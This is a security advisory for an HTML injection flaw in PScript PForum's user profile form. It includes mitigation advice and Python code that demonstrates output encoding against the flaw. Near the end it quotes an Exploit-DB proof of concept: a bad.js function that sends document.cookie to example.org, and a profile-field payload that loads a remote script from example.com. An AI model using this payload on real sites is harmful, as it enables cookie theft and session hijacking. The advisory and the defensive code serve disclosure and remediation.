Vendor: PForum
CVSS: 7.5 (HIGH)
Vulnerability type: HTML Injection
CWE: 79
Product Name: PForum
Patch Exists: NO

PScript PForum HTML Injection Vulnerability

PScript PForum is vulnerable to HTML injection because user input submitted through the user profile form is not sufficiently sanitized. The vulnerability can be exploited to steal cookie-based authentication credentials and potentially to exploit browser security flaws.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input sanitization and validation techniques to prevent the injection of malicious HTML code. Additionally, users should be cautious when clicking on untrusted links or visiting untrusted websites.
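The following is an added example, not PForum code and not part of the original advisory. It shows the mitigation above as output encoding plus allow-list validation, tested against the profile-field string quoted later on this page. It assumes the stored value is echoed into a double-quoted `value` attribute; the field names, validation rules and function names are hypothetical.

```python
import html
import re

# Sample input: the input-box string quoted in this page's raw data, joined into one line.
POC = ('"><script src=http://example.com/bad.js></script>'
       '<img height=0 width=0 src=foo onerror=b(); >')

# Assumed allow-list rules (not taken from PForum): a hostname with optional
# port for the IRC server field, a short alphanumeric name for the AIM ID field.
FIELD_RULES = {
    "irc_server": re.compile(
        r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,98}[A-Za-z0-9])?(?::\d{1,5})?"),
    "aim_id": re.compile(r"[A-Za-z0-9 ]{3,16}"),
}

def validate_field(name, value):
    """Input-side check: accept only values that match the field's rule in full."""
    return len(value) <= 100 and FIELD_RULES[name].fullmatch(value) is not None

def render_unsafe(name, value):
    """Vulnerable pattern: the stored value is concatenated into the attribute as-is."""
    return '<input type="text" name="%s" value="%s">' % (name, value)

def render_safe(name, value):
    """Hardened pattern: encode &, <, > and both quote characters at output time."""
    return '<input type="text" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))

def breaks_out_of_attribute(rendered):
    """A single form field should contain exactly one tag opener; more means injection."""
    return len(re.findall(r"<[A-Za-z/]", rendered)) > 1

if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        page = render("irc_server", POC)
        print(label, "-> injected markup:", breaks_out_of_attribute(page))
        print("   ", page)
    print("validator accepts PoC string:", validate_field("irc_server", POC))
    print("validator accepts irc.example.net:6667:",
          validate_field("irc_server", "irc.example.net:6667"))
```

Encoding at output time is the control that closes the hole; the allow-list only narrows what gets stored and should not be relied on alone.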
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10954/info

PScript PForum is reported prone to an HTML injection vulnerability. The vulnerability presents itself due to a lack of sufficient sanitization performed on data submitted through input fields of the PForum user profile form.

This could be exploited to steal cookie-based authentication credentials. It is also possible to use this type of vulnerability as an attack vector to exploit latent browser security flaws.

Create a JavaScript file and save it as bad.js (your domain name is in this case example.com). The file contains the following code:

// bad.js
function b()
{
location.href='example.org/compute_stolen_data.ext?'+document.cookie;
}

Edit your profile and enter the following line into the IRC Server or AIM ID input box. The string has to be shorter than 100 characters.

// Input Box (without line break)
"><script src=http://example.com/bad.js></script>
<img height=0 width=0 src=foo onerror=b(); >